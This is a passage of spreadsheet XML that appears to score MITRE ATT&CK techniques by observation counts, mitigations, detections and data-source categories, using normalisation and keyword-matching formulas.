        <v>1543</v>
      </c>
      <c r="E441" s="37" t="s">
        <v>1548</v>
      </c>
      <c r="F441" s="37">
        <v>1</v>
      </c>
      <c r="G441" s="37">
        <v>0</v>
      </c>
      <c r="H441" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I441" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J441" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K441" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0</v>
      </c>
      <c r="L441" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="M441" s="37">
        <v>0</v>
      </c>
      <c r="N441" s="56">
        <v>0</v>
      </c>
      <c r="O441" s="56">
        <v>17</v>
      </c>
      <c r="P441" s="56">
        <v>77</v>
      </c>
      <c r="Q441" s="56">
        <v>62</v>
      </c>
      <c r="R441" s="57" t="s">
        <v>1039</v>
      </c>
      <c r="S441" s="57">
        <v>5</v>
      </c>
      <c r="T441" s="57" t="s">
        <v>1040</v>
      </c>
      <c r="U441" s="57">
        <v>10</v>
      </c>
      <c r="V441" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.61904747619047618</v>
      </c>
      <c r="W441" s="37">
        <v>15</v>
      </c>
      <c r="X441" s="37">
        <v>0.272727</v>
      </c>
      <c r="Y441" s="37">
        <v>0.272727</v>
      </c>
      <c r="Z441" s="37">
        <v>156</v>
      </c>
      <c r="AA441" s="37">
        <v>1.56</v>
      </c>
      <c r="AB441" s="37">
        <v>1</v>
      </c>
      <c r="AC441" s="37"/>
      <c r="AD441" s="50" t="s">
        <v>1544</v>
      </c>
      <c r="AE441" s="37" t="str" cm="1">
        <f t="array" ref="AE441">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD441)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF441" s="37">
        <v>437</v>
      </c>
      <c r="AG441" s="37" t="str" cm="1">
        <f t="array" ref="AG441">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD441)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH441" s="37">
        <v>437</v>
      </c>
      <c r="AI441" s="37" t="str" cm="1">
        <f t="array" ref="AI441">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD441)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ441" s="37">
        <v>437</v>
      </c>
      <c r="AK441" s="37" t="str" cm="1">
        <f t="array" ref="AK441">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD441)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL441" s="37">
        <v>437</v>
      </c>
      <c r="AM441" s="37" t="str" cm="1">
        <f t="array" ref="AM441">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD441)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AN441" s="37">
        <v>0</v>
      </c>
      <c r="AO441" s="37">
        <v>0</v>
      </c>
      <c r="AP441" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ441" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>390.05467861904759</v>
      </c>
      <c r="AR441" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS441" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT441" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU44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42" spans="1:47" ht="153">
      <c r="A442" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.46666666666666667</v>
      </c>
      <c r="B442" s="37">
        <f t="shared" si="6"/>
        <v>3163.7479529523812</v>
      </c>
      <c r="C442" s="37" t="s">
        <v>1549</v>
      </c>
      <c r="D442" s="50" t="s">
        <v>1550</v>
      </c>
      <c r="E442" s="37"/>
      <c r="F442" s="37">
        <v>1</v>
      </c>
      <c r="G442" s="37">
        <v>1</v>
      </c>
      <c r="H442" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I442" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J442" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K442" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L442" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M442" s="37">
        <v>1</v>
      </c>
      <c r="N442" s="56">
        <v>3</v>
      </c>
      <c r="O442" s="56">
        <v>74</v>
      </c>
      <c r="P442" s="56">
        <v>39</v>
      </c>
      <c r="Q442" s="56">
        <v>45</v>
      </c>
      <c r="R442" s="57" t="s">
        <v>362</v>
      </c>
      <c r="S442" s="57">
        <v>8</v>
      </c>
      <c r="T442" s="57" t="s">
        <v>1551</v>
      </c>
      <c r="U442" s="57">
        <v>16</v>
      </c>
      <c r="V442" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.70476209523809519</v>
      </c>
      <c r="W442" s="37">
        <v>24</v>
      </c>
      <c r="X442" s="37">
        <v>0.43636399999999997</v>
      </c>
      <c r="Y442" s="37">
        <v>0.43636399999999997</v>
      </c>
      <c r="Z442" s="37">
        <v>161</v>
      </c>
      <c r="AA442" s="37">
        <v>1.61</v>
      </c>
      <c r="AB442" s="37">
        <v>1</v>
      </c>
      <c r="AC442" s="37"/>
      <c r="AD442" s="50" t="s">
        <v>1552</v>
      </c>
      <c r="AE442" s="37" t="str" cm="1">
        <f t="array" ref="AE442">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD442)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF442" s="37">
        <v>438</v>
      </c>
      <c r="AG442" s="37" t="str" cm="1">
        <f t="array" ref="AG442">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD442)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AH442" s="37">
        <v>438</v>
      </c>
      <c r="AI442" s="37" t="str" cm="1">
        <f t="array" ref="AI442">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD442)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ442" s="37">
        <v>438</v>
      </c>
      <c r="AK442" s="37" t="str" cm="1">
        <f t="array" ref="AK442">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD442)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AL442" s="37">
        <v>438</v>
      </c>
      <c r="AM442" s="37" t="str" cm="1">
        <f t="array" ref="AM442">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD442)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AN442" s="37">
        <v>0</v>
      </c>
      <c r="AO442" s="37">
        <v>5</v>
      </c>
      <c r="AP442" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.46666666666666667</v>
      </c>
      <c r="AQ442" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>1054.582650984127</v>
      </c>
      <c r="AR442" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS442" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0.23809523809523808</v>
      </c>
      <c r="AT442" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0.23809523809523808</v>
      </c>
      <c r="AU44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125.66460130763417</v>
      </c>
    </row>
    <row r="443" spans="1:47" ht="85">
      <c r="A443" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.6333333333333333</v>
      </c>
      <c r="B443" s="37">
        <f t="shared" si="6"/>
        <v>652.59983266666654</v>
      </c>
      <c r="C443" s="37" t="s">
        <v>1553</v>
      </c>
      <c r="D443" s="50" t="s">
        <v>1550</v>
      </c>
      <c r="E443" s="37" t="s">
        <v>1554</v>
      </c>
      <c r="F443" s="37">
        <v>1</v>
      </c>
      <c r="G443" s="37">
        <v>1</v>
      </c>
      <c r="H443" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I443" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J443" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K443" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L443" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M443" s="37">
        <v>0</v>
      </c>
      <c r="N443" s="56">
        <v>1</v>
      </c>
      <c r="O443" s="56">
        <v>12</v>
      </c>
      <c r="P443" s="56">
        <v>2</v>
      </c>
      <c r="Q443" s="56">
        <v>0</v>
      </c>
      <c r="R443" s="57" t="s">
        <v>362</v>
      </c>
      <c r="S443" s="57">
        <v>8</v>
      </c>
      <c r="T443" s="57" t="s">
        <v>1555</v>
      </c>
      <c r="U443" s="57">
        <v>13</v>
      </c>
      <c r="V443" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.27142847619047616</v>
      </c>
      <c r="W443" s="37">
        <v>21</v>
      </c>
      <c r="X443" s="37">
        <v>0.38181799999999999</v>
      </c>
      <c r="Y443" s="37">
        <v>0.38181799999999999</v>
      </c>
      <c r="Z443" s="37">
        <v>15</v>
      </c>
      <c r="AA443" s="37">
        <v>0.15</v>
      </c>
      <c r="AB443" s="37">
        <v>0.15</v>
      </c>
      <c r="AC443" s="37"/>
      <c r="AD443" s="50" t="s">
        <v>1556</v>
      </c>
      <c r="AE443" s="37" t="str" cm="1">
        <f t="array" ref="AE443">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD443)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF443" s="37">
        <v>439</v>
      </c>
      <c r="AG443" s="37" t="str" cm="1">
        <f t="array" ref="AG443">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD443)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH443" s="37">
        <v>439</v>
      </c>
      <c r="AI443" s="37" t="str" cm="1">
        <f t="array" ref="AI443">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD443)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ443" s="37">
        <v>439</v>
      </c>
      <c r="AK443" s="37" t="str" cm="1">
        <f t="array" ref="AK443">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD443)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL443" s="37">
        <v>439</v>
      </c>
      <c r="AM443" s="37" t="str" cm="1">
        <f t="array" ref="AM443">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD443)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AN443" s="37">
        <v>0</v>
      </c>
      <c r="AO443" s="37">
        <v>10</v>
      </c>
      <c r="AP443" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.6333333333333333</v>
      </c>
      <c r="AQ443" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>217.53327755555551</v>
      </c>
      <c r="AR443" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS443" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0.47619047619047616</v>
      </c>
      <c r="AT443" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0.47619047619047616</v>
      </c>
      <c r="AU44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52.031732751322743</v>
      </c>
    </row>
    <row r="444" spans="1:47" ht="68">
      <c r="A444" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="B444" s="37">
        <f t="shared" si="6"/>
        <v>528.29983228571427</v>
      </c>
      <c r="C444" s="37" t="s">
        <v>1557</v>
      </c>
      <c r="D444" s="50" t="s">
        <v>1550</v>
      </c>
      <c r="E444" s="37" t="s">
        <v>1558</v>
      </c>
      <c r="F444" s="37">
        <v>1</v>
      </c>
      <c r="G444" s="37">
        <v>1</v>
      </c>
      <c r="H444" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I444" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J444" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K444" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L444" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M444" s="37">
        <v>0</v>
      </c>
      <c r="N444" s="56">
        <v>0</v>
      </c>
      <c r="O444" s="56">
        <v>0</v>
      </c>
      <c r="P444" s="56">
        <v>0</v>
      </c>
      <c r="Q444" s="56">
        <v>0</v>
      </c>
      <c r="R444" s="57" t="s">
        <v>362</v>
      </c>
      <c r="S444" s="57">
        <v>8</v>
      </c>
      <c r="T444" s="57" t="s">
        <v>1555</v>
      </c>
      <c r="U444" s="57">
        <v>13</v>
      </c>
      <c r="V444" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.19999990476190477</v>
      </c>
      <c r="W444" s="37">
        <v>21</v>
      </c>
      <c r="X444" s="37">
        <v>0.38181799999999999</v>
      </c>
      <c r="Y444" s="37">
        <v>0.38181799999999999</v>
      </c>
      <c r="Z444" s="37">
        <v>0</v>
      </c>
      <c r="AA444" s="37">
        <v>0</v>
      </c>
      <c r="AB444" s="37">
        <v>0</v>
      </c>
      <c r="AC444" s="37"/>
      <c r="AD444" s="50" t="s">
        <v>1559</v>
      </c>
      <c r="AE444" s="37" t="str" cm="1">
        <f t="array" ref="AE444">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD444)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF444" s="37">
        <v>440</v>
      </c>
      <c r="AG444" s="37" t="str" cm="1">
        <f t="array" ref="AG444">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD444)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH444" s="37">
        <v>440</v>
      </c>
      <c r="AI444" s="37" t="str" cm="1">
        <f t="array" ref="AI444">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD444)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ444" s="37">
        <v>440</v>
      </c>
      <c r="AK444" s="37" t="str" cm="1">
        <f t="array" ref="AK444">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD444)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL444" s="37">
        <v>440</v>
      </c>
      <c r="AM444" s="37" t="str" cm="1">
        <f t="array" ref="AM444">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD444)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AN444" s="37">
        <v>0</v>
      </c>
      <c r="AO444" s="37">
        <v>1</v>
      </c>
      <c r="AP444" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="AQ444" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>176.0999440952381</v>
      </c>
      <c r="AR444" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS444" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT444" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU44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4.2166653356009069</v>
      </c>
    </row>
    <row r="445" spans="1:47" ht="34">
      <c r="A445" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B445" s="37">
        <f t="shared" si="6"/>
        <v>479.07168071428566</v>
      </c>
      <c r="C445" s="37" t="s">
        <v>1560</v>
      </c>
      <c r="D445" s="50" t="s">
        <v>1550</v>
      </c>
      <c r="E445" s="37" t="s">
        <v>1561</v>
      </c>
      <c r="F445" s="37">
        <v>1</v>
      </c>
      <c r="G445" s="37">
        <v>1</v>
      </c>
      <c r="H445" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I445" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J445" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K445" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L445" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M445" s="37">
        <v>0</v>
      </c>
      <c r="N445" s="56">
        <v>0</v>
      </c>
      <c r="O445" s="56">
        <v>13</v>
      </c>
      <c r="P445" s="56">
        <v>4</v>
      </c>
      <c r="Q445" s="56">
        <v>5</v>
      </c>
      <c r="R445" s="57" t="s">
        <v>141</v>
      </c>
      <c r="S445" s="57">
        <v>3</v>
      </c>
      <c r="T445" s="57" t="s">
        <v>1562</v>
      </c>
      <c r="U445" s="57">
        <v>4</v>
      </c>
      <c r="V445" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.17142871428571427</v>
      </c>
      <c r="W445" s="37">
        <v>7</v>
      </c>
      <c r="X445" s="37">
        <v>0.127273</v>
      </c>
      <c r="Y445" s="37">
        <v>0.127273</v>
      </c>
      <c r="Z445" s="37">
        <v>22</v>
      </c>
      <c r="AA445" s="37">
        <v>0.22</v>
      </c>
      <c r="AB445" s="37">
        <v>0.22</v>
      </c>
      <c r="AC445" s="37"/>
      <c r="AD445" s="50" t="s">
        <v>1563</v>
      </c>
      <c r="AE445" s="37" t="str" cm="1">
        <f t="array" ref="AE445">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD445)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF445" s="37">
        <v>441</v>
      </c>
      <c r="AG445" s="37" t="str" cm="1">
        <f t="array" ref="AG445">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD445)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH445" s="37">
        <v>441</v>
      </c>
      <c r="AI445" s="37" t="str" cm="1">
        <f t="array" ref="AI445">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD445)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ445" s="37">
        <v>441</v>
      </c>
      <c r="AK445" s="37" t="str" cm="1">
        <f t="array" ref="AK445">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD445)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL445" s="37">
        <v>441</v>
      </c>
      <c r="AM445" s="37" t="str" cm="1">
        <f t="array" ref="AM445">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD445)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AN445" s="37">
        <v>0</v>
      </c>
      <c r="AO445" s="37">
        <v>0</v>
      </c>
      <c r="AP445" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ445" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>159.69056023809523</v>
      </c>
      <c r="AR445" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS445" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT445" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU44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46" spans="1:47" ht="51">
      <c r="A446" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B446" s="37">
        <f t="shared" si="6"/>
        <v>614.93792676190481</v>
      </c>
      <c r="C446" s="37" t="s">
        <v>1564</v>
      </c>
      <c r="D446" s="50" t="s">
        <v>1550</v>
      </c>
      <c r="E446" s="37" t="s">
        <v>1565</v>
      </c>
      <c r="F446" s="37">
        <v>1</v>
      </c>
      <c r="G446" s="37">
        <v>1</v>
      </c>
      <c r="H446" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I446" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J446" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K446" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L446" s="37">
